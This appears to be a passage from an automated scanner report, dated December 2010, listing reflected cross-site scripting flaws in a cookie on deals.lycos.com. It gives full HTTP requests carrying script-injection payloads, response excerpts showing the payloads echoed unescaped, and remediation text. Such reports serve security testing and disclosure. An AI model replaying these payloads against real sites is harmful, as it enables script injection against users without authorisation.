GET /deal/flip-slidehd-720p-16gb-digital-camcorder-130-414368 HTTP/1.1 Host: deals.lycos.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A9e7d6"%3balert(1)//c92b2a5a915; __utmz=1.1292163874.1.2.utmcsr=lycoshome|utmccn=home_deals|utmcmd=right_module; __utma=1.1159493979.1292163871.1292163871.1292163871.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.6.10.1292163871; LycosDeals=urekhuop9o7e7tsuqpcq0rf2l2;
Response
HTTP/1.1 200 OK Date: Sun, 12 Dec 2010 14:33:16 GMT Server: Apache X-Powered-By: PHP/5.1.6 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI" Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:33:16 GMT; path=/ Vary: Accept-Encoding,User-Agent Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 19019
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content- ...[SNIP]...
The value of the diktfc cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c56d7"><script>alert(1)</script>c863840866d was submitted in the diktfc cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /deal/flip-slidehd-720p-16gb-digital-camcorder-130-414368 HTTP/1.1 Host: deals.lycos.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9Ac56d7"><script>alert(1)</script>c863840866d; __utmz=1.1292163874.1.2.utmcsr=lycoshome|utmccn=home_deals|utmcmd=right_module; __utma=1.1159493979.1292163871.1292163871.1292163871.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.6.10.1292163871; LycosDeals=urekhuop9o7e7tsuqpcq0rf2l2;
Response
HTTP/1.1 200 OK Date: Sun, 12 Dec 2010 14:33:15 GMT Server: Apache X-Powered-By: PHP/5.1.6 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI" Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:33:15 GMT; path=/ Vary: Accept-Encoding,User-Agent Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 18986
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content- ...[SNIP]... .scorecardresearch.com/p?c1=2&c2=6036445&c3=&c4=deals.lycos.com/deal/flip-slidehd-720p-16gb-digital-camcorder-130-414368&c5=&c6=&c15=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9Ac56d7"><script>alert(1)</script>c863840866d&cj=1" alt="tracker" /> ...[SNIP]...
The value of the diktfc cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 48163"><script>alert(1)</script>6916582d15c was submitted in the diktfc cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /deal/free-iphone-applications-413656 HTTP/1.1 Host: deals.lycos.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A48163"><script>alert(1)</script>6916582d15c; __utmz=1.1292163874.1.2.utmcsr=lycoshome|utmccn=home_deals|utmcmd=right_module; __utma=1.1159493979.1292163871.1292163871.1292163871.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.6.10.1292163871; LycosDeals=urekhuop9o7e7tsuqpcq0rf2l2;
Response
HTTP/1.1 200 OK Date: Sun, 12 Dec 2010 14:33:03 GMT Server: Apache X-Powered-By: PHP/5.1.6 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI" Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:33:03 GMT; path=/ Vary: Accept-Encoding,User-Agent Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 18895
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content- ...[SNIP]... <img src="http://b.scorecardresearch.com/p?c1=2&c2=6036445&c3=&c4=deals.lycos.com/deal/free-iphone-applications-413656&c5=&c6=&c15=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A48163"><script>alert(1)</script>6916582d15c&cj=1" alt="tracker" /> ...[SNIP]...
The value of the diktfc cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 2f8d2"%3balert(1)//6cf56fb792b was submitted in the diktfc cookie. This input was echoed as 2f8d2";alert(1)//6cf56fb792b in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /deal/free-iphone-applications-413656 HTTP/1.1 Host: deals.lycos.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A2f8d2"%3balert(1)//6cf56fb792b; __utmz=1.1292163874.1.2.utmcsr=lycoshome|utmccn=home_deals|utmcmd=right_module; __utma=1.1159493979.1292163871.1292163871.1292163871.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.6.10.1292163871; LycosDeals=urekhuop9o7e7tsuqpcq0rf2l2;
Response
HTTP/1.1 200 OK Date: Sun, 12 Dec 2010 14:33:05 GMT Server: Apache X-Powered-By: PHP/5.1.6 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI" Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:33:05 GMT; path=/ Vary: Accept-Encoding,User-Agent Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 18795
The value of the diktfc cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c62c4"><script>alert(1)</script>9c619f6f3d6 was submitted in the diktfc cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /deal/hp-home-coupons-up-to-400-off-414278 HTTP/1.1 Host: deals.lycos.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9Ac62c4"><script>alert(1)</script>9c619f6f3d6; __utmz=1.1292163874.1.2.utmcsr=lycoshome|utmccn=home_deals|utmcmd=right_module; __utma=1.1159493979.1292163871.1292163871.1292163871.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.6.10.1292163871; LycosDeals=urekhuop9o7e7tsuqpcq0rf2l2;
Response
HTTP/1.1 200 OK Date: Sun, 12 Dec 2010 14:32:07 GMT Server: Apache X-Powered-By: PHP/5.1.6 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI" Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:32:07 GMT; path=/ Vary: Accept-Encoding,User-Agent Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 17636
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content- ...[SNIP]... g src="http://b.scorecardresearch.com/p?c1=2&c2=6036445&c3=&c4=deals.lycos.com/deal/hp-home-coupons-up-to-400-off-414278&c5=&c6=&c15=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9Ac62c4"><script>alert(1)</script>9c619f6f3d6&cj=1" alt="tracker" /> ...[SNIP]...
The value of the diktfc cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a5635"%3balert(1)//0d3ef562288 was submitted in the diktfc cookie. This input was echoed as a5635";alert(1)//0d3ef562288 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /deal/hp-home-coupons-up-to-400-off-414278 HTTP/1.1 Host: deals.lycos.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9Aa5635"%3balert(1)//0d3ef562288; __utmz=1.1292163874.1.2.utmcsr=lycoshome|utmccn=home_deals|utmcmd=right_module; __utma=1.1159493979.1292163871.1292163871.1292163871.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.6.10.1292163871; LycosDeals=urekhuop9o7e7tsuqpcq0rf2l2;
Response
HTTP/1.1 200 OK Date: Sun, 12 Dec 2010 14:32:08 GMT Server: Apache X-Powered-By: PHP/5.1.6 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI" Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:32:08 GMT; path=/ Vary: Accept-Encoding,User-Agent Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 17666
The value of the diktfc cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 1d30a"%3balert(1)//dda5081c78 was submitted in the diktfc cookie. This input was echoed as 1d30a";alert(1)//dda5081c78 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /deal/iphone-app-price-cuts-deals-from-1-414092 HTTP/1.1 Host: deals.lycos.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A1d30a"%3balert(1)//dda5081c78; __utmz=1.1292163874.1.2.utmcsr=lycoshome|utmccn=home_deals|utmcmd=right_module; __utma=1.1159493979.1292163871.1292163871.1292163871.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.6.10.1292163871; LycosDeals=urekhuop9o7e7tsuqpcq0rf2l2;
Response
HTTP/1.1 200 OK Date: Sun, 12 Dec 2010 14:32:54 GMT Server: Apache X-Powered-By: PHP/5.1.6 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI" Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:32:54 GMT; path=/ Vary: Accept-Encoding,User-Agent Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 19342
The value of the diktfc cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 23774"><script>alert(1)</script>f4fd1e37b84 was submitted in the diktfc cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /deal/iphone-app-price-cuts-deals-from-1-414092 HTTP/1.1 Host: deals.lycos.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A23774"><script>alert(1)</script>f4fd1e37b84; __utmz=1.1292163874.1.2.utmcsr=lycoshome|utmccn=home_deals|utmcmd=right_module; __utma=1.1159493979.1292163871.1292163871.1292163871.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.6.10.1292163871; LycosDeals=urekhuop9o7e7tsuqpcq0rf2l2;
Response
HTTP/1.1 200 OK Date: Sun, 12 Dec 2010 14:32:52 GMT Server: Apache X-Powered-By: PHP/5.1.6 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI" Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:32:53 GMT; path=/ Vary: Accept-Encoding,User-Agent Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 19367
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content- ...[SNIP]... ="http://b.scorecardresearch.com/p?c1=2&c2=6036445&c3=&c4=deals.lycos.com/deal/iphone-app-price-cuts-deals-from-1-414092&c5=&c6=&c15=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A23774"><script>alert(1)</script>f4fd1e37b84&cj=1" alt="tracker" /> ...[SNIP]...
The value of the diktfc cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ad3ea"><script>alert(1)</script>6be4c9f934a was submitted in the diktfc cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /deal/kempler-and-strauss-watch-cell-phone-175-413939 HTTP/1.1 Host: deals.lycos.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9Aad3ea"><script>alert(1)</script>6be4c9f934a; __utmz=1.1292163874.1.2.utmcsr=lycoshome|utmccn=home_deals|utmcmd=right_module; __utma=1.1159493979.1292163871.1292163871.1292163871.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.6.10.1292163871; LycosDeals=urekhuop9o7e7tsuqpcq0rf2l2;
Response
HTTP/1.1 200 OK Date: Sun, 12 Dec 2010 14:33:04 GMT Server: Apache X-Powered-By: PHP/5.1.6 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI" Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:33:05 GMT; path=/ Vary: Accept-Encoding,User-Agent Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 17185
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content- ...[SNIP]... ://b.scorecardresearch.com/p?c1=2&c2=6036445&c3=&c4=deals.lycos.com/deal/kempler-and-strauss-watch-cell-phone-175-413939&c5=&c6=&c15=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9Aad3ea"><script>alert(1)</script>6be4c9f934a&cj=1" alt="tracker" /> ...[SNIP]...
The value of the diktfc cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 7814e"%3balert(1)//72d8244a306 was submitted in the diktfc cookie. This input was echoed as 7814e";alert(1)//72d8244a306 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /deal/kempler-and-strauss-watch-cell-phone-175-413939 HTTP/1.1 Host: deals.lycos.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A7814e"%3balert(1)//72d8244a306; __utmz=1.1292163874.1.2.utmcsr=lycoshome|utmccn=home_deals|utmcmd=right_module; __utma=1.1159493979.1292163871.1292163871.1292163871.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.6.10.1292163871; LycosDeals=urekhuop9o7e7tsuqpcq0rf2l2;
Response
HTTP/1.1 200 OK Date: Sun, 12 Dec 2010 14:33:06 GMT Server: Apache X-Powered-By: PHP/5.1.6 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI" Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:33:06 GMT; path=/ Vary: Accept-Encoding,User-Agent Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 17083
The value of the diktfc cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 44e2d"><script>alert(1)</script>71fb8bc76fa was submitted in the diktfc cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /deal/keydex-stand-for-ipad-ebook-reader-for-14-413522 HTTP/1.1 Host: deals.lycos.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A44e2d"><script>alert(1)</script>71fb8bc76fa; __utmz=1.1292163874.1.2.utmcsr=lycoshome|utmccn=home_deals|utmcmd=right_module; __utma=1.1159493979.1292163871.1292163871.1292163871.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.6.10.1292163871; LycosDeals=urekhuop9o7e7tsuqpcq0rf2l2;
Response
HTTP/1.1 200 OK Date: Sun, 12 Dec 2010 14:31:55 GMT Server: Apache X-Powered-By: PHP/5.1.6 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI" Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:31:55 GMT; path=/ Vary: Accept-Encoding,User-Agent Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 16972
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content- ...[SNIP]... //b.scorecardresearch.com/p?c1=2&c2=6036445&c3=&c4=deals.lycos.com/deal/keydex-stand-for-ipad-ebook-reader-for-14-413522&c5=&c6=&c15=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A44e2d"><script>alert(1)</script>71fb8bc76fa&cj=1" alt="tracker" /> ...[SNIP]...
The value of the diktfc cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 39673"%3balert(1)//133a711edd1 was submitted in the diktfc cookie. This input was echoed as 39673";alert(1)//133a711edd1 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /deal/keydex-stand-for-ipad-ebook-reader-for-14-413522 HTTP/1.1 Host: deals.lycos.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A39673"%3balert(1)//133a711edd1; __utmz=1.1292163874.1.2.utmcsr=lycoshome|utmccn=home_deals|utmcmd=right_module; __utma=1.1159493979.1292163871.1292163871.1292163871.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.6.10.1292163871; LycosDeals=urekhuop9o7e7tsuqpcq0rf2l2;
Response
HTTP/1.1 200 OK Date: Sun, 12 Dec 2010 14:31:56 GMT Server: Apache X-Powered-By: PHP/5.1.6 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI" Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:31:56 GMT; path=/ Vary: Accept-Encoding,User-Agent Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 17050
The value of the diktfc cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 63277"><script>alert(1)</script>b757cca267c was submitted in the diktfc cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /deal/kodak-zi8-1080p-sdhc-digital-camcorder-80-414390 HTTP/1.1 Host: deals.lycos.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A63277"><script>alert(1)</script>b757cca267c; __utmz=1.1292163874.1.2.utmcsr=lycoshome|utmccn=home_deals|utmcmd=right_module; __utma=1.1159493979.1292163871.1292163871.1292163871.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.6.10.1292163871; LycosDeals=urekhuop9o7e7tsuqpcq0rf2l2;
Response
HTTP/1.1 200 OK Date: Sun, 12 Dec 2010 14:33:13 GMT Server: Apache X-Powered-By: PHP/5.1.6 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI" Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:33:13 GMT; path=/ Vary: Accept-Encoding,User-Agent Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 19038
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content- ...[SNIP]... //b.scorecardresearch.com/p?c1=2&c2=6036445&c3=&c4=deals.lycos.com/deal/kodak-zi8-1080p-sdhc-digital-camcorder-80-414390&c5=&c6=&c15=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A63277"><script>alert(1)</script>b757cca267c&cj=1" alt="tracker" /> ...[SNIP]...
The value of the diktfc cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a01b2"%3balert(1)//174a20976d8 was submitted in the diktfc cookie. This input was echoed as a01b2";alert(1)//174a20976d8 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /deal/kodak-zi8-1080p-sdhc-digital-camcorder-80-414390 HTTP/1.1 Host: deals.lycos.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9Aa01b2"%3balert(1)//174a20976d8; __utmz=1.1292163874.1.2.utmcsr=lycoshome|utmccn=home_deals|utmcmd=right_module; __utma=1.1159493979.1292163871.1292163871.1292163871.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.6.10.1292163871; LycosDeals=urekhuop9o7e7tsuqpcq0rf2l2;
Response
HTTP/1.1 200 OK Date: Sun, 12 Dec 2010 14:33:14 GMT Server: Apache X-Powered-By: PHP/5.1.6 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI" Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:33:15 GMT; path=/ Vary: Accept-Encoding,User-Agent Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 19005
